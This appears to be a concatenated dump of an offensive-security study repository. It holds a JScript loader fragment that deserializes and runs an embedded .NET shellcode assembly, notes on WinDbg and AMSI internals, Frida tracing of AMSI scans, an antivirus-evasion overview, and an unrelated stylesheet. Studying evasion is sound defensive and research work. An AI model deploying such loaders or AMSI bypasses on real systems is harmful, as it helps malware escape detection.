"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAExAIAAAEAUwB0AHIAaQBuAGcA"+ 106 | "RgBpAGwAZQBJAG4AZgBvAAAAoAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBl"+ 107 | "AG4AdABzAAAAAAAAACYAAwABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAASABQAAAAAABKABEA"+ 108 | "AQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAASgBzAGMAcgBpAHAAdABTAGgAZQBs"+ 109 | "AGwAYwBvAGQAZQAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAA"+ 110 | "LgAwAAAASgAVAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABKAHMAYwByAGkAcAB0AFMAaABl"+ 111 | "AGwAbABjAG8AZABlAC4AZABsAGwAAAAAAEwAFAABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgA"+ 112 | "dAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgAEgAUAAgADIAMAAyADIAAAAqAAEAAQBMAGUAZwBh"+ 113 | "AGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAFIAFQABAE8AcgBpAGcAaQBuAGEAbABGAGkA"+ 114 | "bABlAG4AYQBtAGUAAABKAHMAYwByAGkAcAB0AFMAaABlAGwAbABjAG8AZABlAC4AZABsAGwAAAAA"+ 115 | "AEIAEQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASgBzAGMAcgBpAHAAdABTAGgAZQBsAGwA"+ 116 | "YwBvAGQAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAw"+ 117 | "AC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAA"+ 118 | "LgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 119 | "AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAHQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 120 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 121 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 122 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 123 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 124 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 125 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 126 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 127 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 128 | 
"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+ 129 | "ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; 130 | var entry_class = 'JscriptShellcode'; 131 | 132 | try { 133 | setversion(); 134 | var stm = base64ToStream(serialized_obj); 135 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 136 | var al = new ActiveXObject('System.Collections.ArrayList'); 137 | var d = fmt.Deserialize_2(stm); 138 | al.Add(undefined); 139 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 140 | 141 | } catch (e) { 142 | debug(e.message); 143 | } -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/README.md: -------------------------------------------------------------------------------- 1 | # Intel Architecture and Windows 10 2 | 3 | There are two primary assembly syntaxes : 4 | 5 | - Intel 6 | - x86 (32-bit) 7 | - x86_64 (64-bit) 8 | - AT&T 9 | 10 | ## Intel Architecture 11 | 12 | In the Intel assembly languages, both the 32-bit and the 64-bit are quite similar at assembly level and make use of stack, heap and registers to carry out different instructions. The 64-bit version is just an extension to the 32-bit version. 13 | 14 | Memory space supported : 15 | 16 | 32 bit - 2 GB \ 17 | 64 bit - 128 TB 18 | 19 | The registers in the 32-bit environment can be found in the below table : 20 | 21 | ![32-bit-cpu-registers](./images/Windbg/32-bit.png) 22 | 23 | The registers in the 64-bit environment can be found in the below table : 24 | 25 | ![64-bit-cpu-registers](./images/Windbg/64-bit.png) 26 | 27 | The most important registers in the 32-bit are the ESP and the EIP. They are the Stack pointer and the Instruction pointer. Their 64-bit counterparts are the RSP and the RIP. 28 | 29 | ESP/RSP - Memory address to the top of the stack 30 | EIP/RIP - Address of the assembly instruction to be executed. 
31 | 32 | Two types of instructions : 33 | 34 | - Function calls 35 | - Conditional Branching 36 | 37 | ## Intro to Windbg 38 | 39 | WinDbg can be found in the Microsoft Store. It supports both 32-bit and 64-bit targets. Open Notepad and start WinDbg. 40 | 41 | ![windbg-search](./images/Windbg/windbg-search.png) 42 | 43 | Go to File > Start Debugging > Attach to a process 44 | 45 | ![process-search](./images/Windbg/search-process.png) 46 | 47 | Below we can see the interface with the attached process. The process execution is paused. Now let us set a breakpoint on the WriteFile function. The breakpoint will be hit when the process writes something to a file. 48 | 49 | > **bp** is used to set a breakpoint \ 50 | > **kernel32** is the dynamic link library (DLL) which exports the **WriteFile** function \ 51 | > **WriteFile** is the function that gets called when anything is written to disk \ 52 | > **g** is used to resume execution after the breakpoint has been hit \ 53 | > **p** is used to step through a single assembly instruction at a time \ 54 | > **r** is used to view all registers 55 | 56 | 57 | ![write-file-breakpoint](./images/Windbg/create-breakpoint.png) 58 | 59 | Now resume execution. Write something in Notepad to trigger the breakpoint. 60 | 61 | ![breakpoint-hit](./images/Windbg/breakpoint-hit.png) 62 | 63 | Now we can step to the next instruction with the 'p' command. 64 | 65 | ![move-through-instructions](./images/Windbg/move-through-instructions.png) 66 | 67 | We can view the next 7 instructions with the 'u' command, which stands for unassemble. 68 | 69 | ![view-7-instructions](./images/Windbg/view-7-instructions.png) 70 | 71 | We can also view all the registers with the 'r' command. 72 | 73 | ![view-registers](./images/Windbg/view-registers.png) 74 | 75 | We can get a more detailed view of the memory referenced by the registers using the dd, dc and dq commands. 
76 | 77 | dd - 32 bit 78 | dc - 32 bit with ASCII 79 | dq - 64 bit 80 | 81 | ![detailed-view](./images/Windbg/detailed-view.png) 82 | 83 | Finally, we can also modify the stack with the 'ed' command. 84 | 85 | ![modify-stack](./images/Windbg/modify-stack.png) 86 | 87 | > RESOURCES : 88 | > 89 | > - https://en.wikipedia.org/wiki/X86 90 | > - https://en.wikipedia.org/wiki/Assembly_language 91 | > - https://en.wikipedia.org/wiki/X86-64 92 | > - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-controlling-breakpoints 93 | > - https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile?redirectedfrom=MSDN 94 | 95 |   96 | 97 | # AntiMalware Scan Interface 98 | 99 | ## Basic Understanding 100 | 101 | The Antimalware Scan Interface (AMSI) was introduced by Microsoft to allow runtime inspection of PowerShell commands and scripts. It captures script content, e.g. C#, VBA, PowerShell etc., and sends it to the AV for scanning. 102 | 103 | AMSI interacts with the antivirus software via Remote Procedure Calls (RPC). 104 | 105 | ![flowchart](./images/AMSI/flowchart.png) 106 | 107 | The unmanaged DLL, AMSI.dll, is loaded into every PowerShell process and provides a number of APIs which PowerShell uses. The APIs exported by AMSI are _AmsiInitialize_, _AmsiOpenSession_, _AmsiScanString_, _AmsiScanBuffer_ and _AmsiCloseSession_. 108 | 109 | **_AmsiInitialize_** 110 | 111 | Function : 112 | 113 | HRESULT AmsiInitialize( 114 | LPCWSTR appName, 115 | HAMSICONTEXT \*amsiContext 116 | ); 117 | 118 | Explanation : 119 | 120 | 1. The first argument is the name of the application. 121 | 2. The second argument is a pointer that receives the context structure. 122 | 123 |   124 | 125 | > **NOTE** : The call to _AmsiInitialize_ is made before we can invoke any PowerShell command, hence we cannot influence it in any way. 
126 | 127 |   128 | 129 | **_AmsiOpenSession_** 130 | 131 | Function : 132 | 133 | HRESULT AmsiOpenSession( 134 | HAMSICONTEXT amsiContext, 135 | HAMSISESSION \*amsiSession 136 | ); 137 | 138 | Explanation : 139 | 140 | 1. The first argument takes the context structure returned by _AmsiInitialize_. 141 | 2. The second argument is a pointer that receives the newly created session. This session handle is used in all scan calls for that session. 142 | 143 |   144 | 145 | **_AmsiScanBuffer_** 146 | 147 | Function : 148 | 149 | HRESULT AmsiScanBuffer( 150 | HAMSICONTEXT amsiContext, 151 | PVOID buffer, 152 | ULONG length, 153 | LPCWSTR contentName, 154 | HAMSISESSION amsiSession, 155 | AMSI_RESULT *result 156 | ); 157 | 158 | Explanation : 159 | 160 | 1. The first argument takes the context received from _AmsiInitialize_. 161 | 2. The second argument points to the buffer which has to be scanned. 162 | 3. The third argument is the length of the buffer in bytes. 163 | 4. The fourth argument contains the filename/URL/unique string etc., anything that identifies the buffer being scanned. 164 | 5. The fifth argument contains the session received from _AmsiOpenSession_. It is used if multiple scan requests are to be correlated within one session; otherwise it is set to **nullptr**. 165 | 6. The sixth argument receives the result of the scan. A value of "1" (AMSI_RESULT_NOT_DETECTED) indicates a clean scan and a value of "32768" (AMSI_RESULT_DETECTED) indicates the presence of malware. 166 | 167 | > NOTE : 168 | > 169 | > - Once the session is over, _AmsiCloseSession_ closes the current AMSI scanning session. 170 | > - _AmsiScanBuffer_ supersedes _AmsiScanString_, as the latter was vulnerable to trivial AMSI bypass attacks. 
171 | 172 |   173 | 174 | > RESOURCES : 175 | > 176 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiinitialize 177 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiopensession 178 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanstring 179 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer 180 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiclosesession 181 | > - https://docs.microsoft.com/en-gb/windows/win32/api/amsi/ne-amsi-amsi_result 182 | 183 |   184 | 185 | ## Dynamic Analysis of AMSI with Frida 186 | 187 | Frida is a dynamic instrumentation framework used for debugging and tracing. Its command-line tooling is written in Python, while the instrumentation scripts (hooks) are written in JavaScript. 188 | 189 | Command to install Frida : 190 | 191 | pip install frida-tools 192 | 193 | Also add the Scripts directory to your PATH environment variable. Go to System Properties > Environment Variables > Path 194 | 195 | The path for me is : 196 | 197 | C:\Users\IEUser\AppData\Local\Programs\Python\Python310\Scripts\ 198 | 199 | This can vary according to your user and where you have Python installed. 
200 | 201 | Now open PowerShell and get its process ID with the command : 202 | 203 | Get-Process | Select-Object -Property Id,ProcessName | Where-Object {$_.ProcessName -like "*power*"} 204 | 205 | ![current-process](./images/AMSI/current-process.png) 206 | 207 | Open a new PowerShell instance and run the same command again; this time note down the new process ID : 208 | 209 | ![new-process](./images/AMSI/new-process.png) 210 | 211 | Run frida-trace on the new process : 212 | 213 | ![frida-trace](./images/AMSI/frida-trace.png) 214 | 215 | Flags : 216 | 217 | -p : process ID \ 218 | -x : the DLL to trace \ 219 | -i : the specific APIs to trace 220 | 221 | Now when we enter any string, we can see the API calls being made : 222 | 223 | ![test-string](./images/AMSI/test-string.png) 224 | 225 | When we start a Frida session, handler files are created for each hooked API : 226 | 227 | ![handlers](./images/AMSI/handlers.png) 228 | 229 | We can view the _AmsiScanBuffer_ handler file to see what the handler does when that API is encountered : 230 | 231 | ![amsi-scan-buffer](./images/AMSI/amsi-scan-buffer-handler.png) 232 | 233 | We can edit the _onEnter_ function to display more information when the API is called : 234 | 235 | ![onEnter](./images/AMSI/onEnter.png) 236 | 237 | Explanation : 238 | 239 | 1. The values of the API's arguments are available in the **_args_** array. 240 | 2. readUtf16String reads the buffer as a UTF-16 (Unicode) string so that its content can be printed. 241 | 3. The last argument is the resultPointer, the pointer to the result of the AMSI scan. We save it in a JavaScript variable on "this" so we can access it later in _onLeave_. 242 | 243 | Similarly we can edit the _onLeave_ function : 244 | 245 | ![onLeave](./images/AMSI/onLeave.png) 246 | 247 | Explanation : 248 | 249 | 1. We use the "this" keyword to retrieve the saved resultPointer. 250 | 2. We use readUShort to read the result through that pointer and print it to the console. 
251 | 252 | Now let us test out this code by entering a random string : 253 | 254 | ![random-string](./images/AMSI/random-string.png) 255 | 256 | > **NOTE** : We can see that the result is "1", which means the entered text was not flagged by the AV. 257 | 258 | Now let us try the same with a string which may get flagged : 259 | 260 | ![mal-string](./images/AMSI/mal-string.png) 261 | 262 | We can see that the result is "32768" and we also got a malicious activity error in our PowerShell session. 263 | 264 | Now trying to bypass this by splitting and concatenating the string : 265 | 266 | ![split-bypass](./images/AMSI/split-bypass.png) 267 | 268 |   269 | 270 | > RESOURCES : 271 | > 272 | > - https://www.frida.re/docs/javascript-api/#memory 273 | > - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/this 274 | > - https://www.frida.re/ 275 | 276 |   277 | 278 | # Bypassing AMSI with Reflection 279 | 280 | ## Messing around with AMSI functions 281 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/styles.css: -------------------------------------------------------------------------------- 1 | @keyframes loading { 2 | 0% { 3 | transform: rotate(0deg); 4 | } 5 | 6 | 100% { 7 | transform: rotate(360deg); 8 | } 9 | } 10 | 11 | .workspace-leaf-content[data-type='git-view'] .view-content { 12 | padding: 0; 13 | } 14 | 15 | .workspace-leaf-content[data-type='git-history-view'] .view-content { 16 | padding: 0; 17 | } 18 | 19 | .loading>svg { 20 | animation: 2s linear infinite loading; 21 | transform-origin: 50% 50%; 22 | display: inline-block; 23 | } 24 | 25 | .obsidian-git-center { 26 | margin: auto; 27 | text-align: center; 28 | width: 50%; 29 | } 30 | 31 | .obsidian-git-textarea { 32 | display: block; 33 | margin-left: auto; 34 | margin-right: auto; 35 | } 36 | 37 | .obsidian-git-center-button { 38 | display: block; 39 | margin: 20px auto; 40 | } 41 | 42 | .tooltip.mod-left { 43 | overflow-wrap: 
break-word; 44 | } 45 | 46 | .tooltip.mod-right { 47 | overflow-wrap: break-word; 48 | } 49 | .git-tools { 50 | display: flex; 51 | margin-left: auto; 52 | } 53 | .git-tools .type { 54 | padding-left: var(--size-2-1); 55 | display: flex; 56 | align-items: center; 57 | justify-content: center; 58 | width: 11px; 59 | } 60 | 61 | .git-tools .type[data-type="M"] { 62 | color: orange; 63 | } 64 | .git-tools .type[data-type="D"] { 65 | color: red; 66 | } 67 | .git-tools .buttons { 68 | display: flex; 69 | } 70 | .git-tools .buttons > * { 71 | padding: 0 0; 72 | height: auto; 73 | } 74 | 75 | .workspace-leaf-content[data-type="diff-view"] .d2h-d-none { 76 | display: none; 77 | } 78 | 79 | .workspace-leaf-content[data-type="diff-view"] .d2h-wrapper { 80 | text-align: left; 81 | } 82 | 83 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-header { 84 | background-color: var(--background-primary); 85 | border-bottom: 1px solid var(--interactive-accent); 86 | font-family: var(--font-monospace); 87 | height: 35px; 88 | padding: 5px 10px; 89 | } 90 | 91 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-header, 92 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-stats { 93 | display: -webkit-box; 94 | display: -ms-flexbox; 95 | display: flex; 96 | } 97 | 98 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-stats { 99 | font-size: 14px; 100 | margin-left: auto; 101 | } 102 | 103 | .workspace-leaf-content[data-type="diff-view"] .d2h-lines-added { 104 | border: 1px solid #b4e2b4; 105 | border-radius: 5px 0 0 5px; 106 | color: #399839; 107 | padding: 2px; 108 | text-align: right; 109 | vertical-align: middle; 110 | } 111 | 112 | .workspace-leaf-content[data-type="diff-view"] .d2h-lines-deleted { 113 | border: 1px solid #e9aeae; 114 | border-radius: 0 5px 5px 0; 115 | color: #c33; 116 | margin-left: 1px; 117 | padding: 2px; 118 | text-align: left; 119 | vertical-align: middle; 120 | } 121 | 122 | .workspace-leaf-content[data-type="diff-view"] 
.d2h-file-name-wrapper { 123 | -webkit-box-align: center; 124 | -ms-flex-align: center; 125 | align-items: center; 126 | display: -webkit-box; 127 | display: -ms-flexbox; 128 | display: flex; 129 | font-size: 15px; 130 | width: 100%; 131 | } 132 | 133 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-name { 134 | overflow-x: hidden; 135 | text-overflow: ellipsis; 136 | white-space: nowrap; 137 | } 138 | 139 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-wrapper { 140 | border: 1px solid var(--background-modifier-border); 141 | border-radius: 3px; 142 | margin-bottom: 1em; 143 | } 144 | 145 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse { 146 | -webkit-box-pack: end; 147 | -ms-flex-pack: end; 148 | -webkit-box-align: center; 149 | -ms-flex-align: center; 150 | align-items: center; 151 | border: 1px solid var(--background-modifier-border); 152 | border-radius: 3px; 153 | cursor: pointer; 154 | display: none; 155 | font-size: 12px; 156 | justify-content: flex-end; 157 | padding: 4px 8px; 158 | } 159 | 160 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse.d2h-selected { 161 | background-color: #c8e1ff; 162 | } 163 | 164 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse-input { 165 | margin: 0 4px 0 0; 166 | } 167 | 168 | .workspace-leaf-content[data-type="diff-view"] .d2h-diff-table { 169 | border-collapse: collapse; 170 | font-family: Menlo, Consolas, monospace; 171 | font-size: 13px; 172 | width: 100%; 173 | } 174 | 175 | .workspace-leaf-content[data-type="diff-view"] .d2h-files-diff { 176 | width: 100%; 177 | } 178 | 179 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff { 180 | overflow-y: hidden; 181 | } 182 | 183 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-side-diff { 184 | display: inline-block; 185 | margin-bottom: -8px; 186 | margin-right: -4px; 187 | overflow-x: scroll; 188 | overflow-y: hidden; 189 | width: 50%; 190 | } 191 | 192 | 
.workspace-leaf-content[data-type="diff-view"] .d2h-code-line { 193 | padding: 0 8em; 194 | } 195 | 196 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line, 197 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line { 198 | display: inline-block; 199 | -webkit-user-select: none; 200 | -moz-user-select: none; 201 | -ms-user-select: none; 202 | user-select: none; 203 | white-space: nowrap; 204 | width: 100%; 205 | } 206 | 207 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line { 208 | padding: 0 4.5em; 209 | } 210 | 211 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-ctn { 212 | word-wrap: normal; 213 | background: none; 214 | display: inline-block; 215 | padding: 0; 216 | -webkit-user-select: text; 217 | -moz-user-select: text; 218 | -ms-user-select: text; 219 | user-select: text; 220 | vertical-align: middle; 221 | white-space: pre; 222 | width: 100%; 223 | } 224 | 225 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 226 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del { 227 | background-color: #ffb6ba; 228 | } 229 | 230 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 231 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del { 232 | background-color: #8d232881; 233 | } 234 | 235 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 236 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 237 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del, 238 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line ins { 239 | border-radius: 0.2em; 240 | display: inline-block; 241 | margin-top: -1px; 242 | text-decoration: none; 243 | vertical-align: middle; 244 | } 245 | 246 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 247 | .theme-light .workspace-leaf-content[data-type="diff-view"] 
.d2h-code-side-line ins { 248 | background-color: #97f295; 249 | text-align: left; 250 | } 251 | 252 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 253 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line ins { 254 | background-color: #1d921996; 255 | text-align: left; 256 | } 257 | 258 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-prefix { 259 | word-wrap: normal; 260 | background: none; 261 | display: inline; 262 | padding: 0; 263 | white-space: pre; 264 | } 265 | 266 | .workspace-leaf-content[data-type="diff-view"] .line-num1 { 267 | float: left; 268 | } 269 | 270 | .workspace-leaf-content[data-type="diff-view"] .line-num1, 271 | .workspace-leaf-content[data-type="diff-view"] .line-num2 { 272 | -webkit-box-sizing: border-box; 273 | box-sizing: border-box; 274 | overflow: hidden; 275 | padding: 0 0.5em; 276 | text-overflow: ellipsis; 277 | width: 3.5em; 278 | } 279 | 280 | .workspace-leaf-content[data-type="diff-view"] .line-num2 { 281 | float: right; 282 | } 283 | 284 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber { 285 | background-color: var(--background-primary); 286 | border: solid var(--background-modifier-border); 287 | border-width: 0 1px; 288 | -webkit-box-sizing: border-box; 289 | box-sizing: border-box; 290 | color: var(--text-muted); 291 | cursor: pointer; 292 | display: inline-block; 293 | position: absolute; 294 | text-align: right; 295 | width: 7.5em; 296 | } 297 | 298 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber:after { 299 | content: "\200b"; 300 | } 301 | 302 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber { 303 | background-color: var(--background-primary); 304 | border: solid var(--background-modifier-border); 305 | border-width: 0 1px; 306 | -webkit-box-sizing: border-box; 307 | box-sizing: border-box; 308 | color: var(--text-muted); 309 | cursor: pointer; 310 | display: inline-block; 311 | 
overflow: hidden; 312 | padding: 0 0.5em; 313 | position: absolute; 314 | text-align: right; 315 | text-overflow: ellipsis; 316 | width: 4em; 317 | } 318 | 319 | .workspace-leaf-content[data-type="diff-view"] .d2h-diff-tbody tr { 320 | position: relative; 321 | } 322 | 323 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber:after { 324 | content: "\200b"; 325 | } 326 | 327 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-emptyplaceholder, 328 | .workspace-leaf-content[data-type="diff-view"] .d2h-emptyplaceholder { 329 | background-color: var(--background-primary); 330 | border-color: var(--background-modifier-border); 331 | } 332 | 333 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-prefix, 334 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber, 335 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber, 336 | .workspace-leaf-content[data-type="diff-view"] .d2h-emptyplaceholder { 337 | -webkit-user-select: none; 338 | -moz-user-select: none; 339 | -ms-user-select: none; 340 | user-select: none; 341 | } 342 | 343 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber, 344 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber { 345 | direction: rtl; 346 | } 347 | 348 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-del { 349 | background-color: #fee8e9; 350 | border-color: #e9aeae; 351 | } 352 | 353 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-ins { 354 | background-color: #dfd; 355 | border-color: #b4e2b4; 356 | } 357 | 358 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-del { 359 | background-color: #521b1d83; 360 | border-color: #691d1d73; 361 | } 362 | 363 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-ins { 364 | background-color: rgba(30, 71, 30, 0.5); 365 | border-color: #13501381; 366 | } 367 | 368 | .workspace-leaf-content[data-type="diff-view"] .d2h-info 
{ 369 | background-color: var(--background-primary); 370 | border-color: var(--background-modifier-border); 371 | color: var(--text-normal); 372 | } 373 | 374 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-del.d2h-change { 375 | background-color: #fdf2d0; 376 | } 377 | 378 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-del.d2h-change { 379 | background-color: #55492480; 380 | } 381 | 382 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-ins.d2h-change { 383 | background-color: #ded; 384 | } 385 | 386 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-ins.d2h-change { 387 | background-color: rgba(37, 78, 37, 0.418); 388 | } 389 | 390 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper { 391 | margin-bottom: 10px; 392 | } 393 | 394 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper a { 395 | color: #3572b0; 396 | text-decoration: none; 397 | } 398 | 399 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper a:visited { 400 | color: #3572b0; 401 | } 402 | 403 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-header { 404 | text-align: left; 405 | } 406 | 407 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-title { 408 | font-weight: 700; 409 | } 410 | 411 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-line { 412 | display: -webkit-box; 413 | display: -ms-flexbox; 414 | display: flex; 415 | text-align: left; 416 | } 417 | 418 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list { 419 | display: block; 420 | list-style: none; 421 | margin: 0; 422 | padding: 0; 423 | } 424 | 425 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list>li { 426 | border-bottom: 1px solid var(--background-modifier-border); 427 | margin: 0; 428 | padding: 5px 10px; 429 | } 430 | 431 | .workspace-leaf-content[data-type="diff-view"] 
.d2h-file-list>li:last-child { 432 | border-bottom: none; 433 | } 434 | 435 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-switch { 436 | cursor: pointer; 437 | display: none; 438 | font-size: 10px; 439 | } 440 | 441 | .workspace-leaf-content[data-type="diff-view"] .d2h-icon { 442 | fill: currentColor; 443 | margin-right: 10px; 444 | vertical-align: middle; 445 | } 446 | 447 | .workspace-leaf-content[data-type="diff-view"] .d2h-deleted { 448 | color: #c33; 449 | } 450 | 451 | .workspace-leaf-content[data-type="diff-view"] .d2h-added { 452 | color: #399839; 453 | } 454 | 455 | .workspace-leaf-content[data-type="diff-view"] .d2h-changed { 456 | color: #d0b44c; 457 | } 458 | 459 | .workspace-leaf-content[data-type="diff-view"] .d2h-moved { 460 | color: #3572b0; 461 | } 462 | 463 | .workspace-leaf-content[data-type="diff-view"] .d2h-tag { 464 | background-color: var(--background-primary); 465 | display: -webkit-box; 466 | display: -ms-flexbox; 467 | display: flex; 468 | font-size: 10px; 469 | margin-left: 5px; 470 | padding: 0 2px; 471 | } 472 | 473 | .workspace-leaf-content[data-type="diff-view"] .d2h-deleted-tag { 474 | border: 2px solid #c33; 475 | } 476 | 477 | .workspace-leaf-content[data-type="diff-view"] .d2h-added-tag { 478 | border: 1px solid #399839; 479 | } 480 | 481 | .workspace-leaf-content[data-type="diff-view"] .d2h-changed-tag { 482 | border: 1px solid #d0b44c; 483 | } 484 | 485 | .workspace-leaf-content[data-type="diff-view"] .d2h-moved-tag { 486 | border: 1px solid #3572b0; 487 | } 488 | 489 | /* ====================== Line Authoring Information ====================== */ 490 | 491 | .cm-gutterElement.obs-git-blame-gutter { 492 | /* Add background color to spacing inbetween and around the gutter for better aesthetics */ 493 | border-width: 0px 2px 0.2px 2px; 494 | border-style: solid; 495 | border-color: var(--background-secondary); 496 | background-color: var(--background-secondary); 497 | } 498 | 499 | 
.cm-gutterElement.obs-git-blame-gutter > div, .line-author-settings-preview { 500 | /* delegate text color to settings */ 501 | color: var(--obs-git-gutter-text); 502 | font-family: monospace; 503 | height: 100%; /* ensure, that age-based background color occupies entire parent */ 504 | text-align: right; 505 | padding: 0px 6px 0px 6px; 506 | white-space: pre; /* Keep spaces and do not collapse them. */ 507 | } 508 | -------------------------------------------------------------------------------- /Antivirus Evasion/README.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | AV software can combine the following methods to detect malicious files :- 4 | 5 | 1. Signature Based Scanning 6 | - Often relies on SHA-1 or MD5 hashes of the whole file. 7 | - It also uses certain unique byte sequences from malicious files for detection. 8 | 2. Behavioral Analysis 9 | - Runs the file in a sandboxed/emulated environment and watches what it does 10 | - Newer approaches use cloud lookups and machine learning for better accuracy 11 | 12 | For our testing we will rely on :- 13 | 14 | - clamav command line tool 15 | - Avira AV 16 | - Antiscan.me 17 | - Virustotal (Use with caution: every uploaded sample is shared with the AV vendors, so a payload meant for a real engagement will be signatured soon after upload. Test reusable payloads with a local scanner or a no-distribute service instead) 18 | 19 |   20 | 21 | # Signature Based Detection 22 | 23 | Hash-based signature scans can be bypassed by changing 